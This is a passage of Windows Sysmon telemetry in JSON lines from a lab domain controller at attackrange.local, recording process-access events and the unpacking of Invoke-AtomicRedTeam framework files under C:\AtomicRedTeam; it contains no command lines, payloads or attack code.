C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.514","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4601,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.514\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.514","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4602,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.514\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.514","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4603,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.514\r\nSourceProcessGUID: {A837DB8D-0312-5F25-0000-001074B50600}\r\nSourceProcessId: 1256\r\nSourceThreadId: 2756\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.514","SourceProcessGUID":"{A837DB8D-0312-5F25-0000-001074B50600}","SourceProcessId":"1256","SourceThreadId":"2756","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0313-5F25-0000-001016DC0600}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4604,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.545\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.545","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0313-5F25-0000-001016DC0600}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4605,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.561\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_sw0h51rw.sny.ps1\r\nCreationUtcTime: 2020-08-01 05:52:19.561","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.561","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_sw0h51rw.sny.ps1","CreationUtcTime":"2020-08-01 05:52:19.561","EventReceivedTime":"2020-08-01 05:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4606,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.592\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.592","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0313-5F25-0000-001016DC0600}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4607,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.592\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.592","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0313-5F25-0000-001016DC0600}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4608,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.092\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\AtomicClassSchema.ps1\r\nCreationUtcTime: 2020-08-01 05:52:21.092","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.092","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\AtomicClassSchema.ps1","CreationUtcTime":"2020-08-01 05:52:21.092","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4609,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.092\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Get-PrereqExecutor.ps1\r\nCreationUtcTime: 2020-08-01 05:52:21.092","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:21.092","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Get-PrereqExecutor.ps1","CreationUtcTime":"2020-08-01 05:52:21.092","EventReceivedTime":"2020-08-01 05:52:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4610,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:21.092\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Get-TargetInfo.ps1\r\nCreationUtcTime: 2020-08-01 05:52:21.092","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 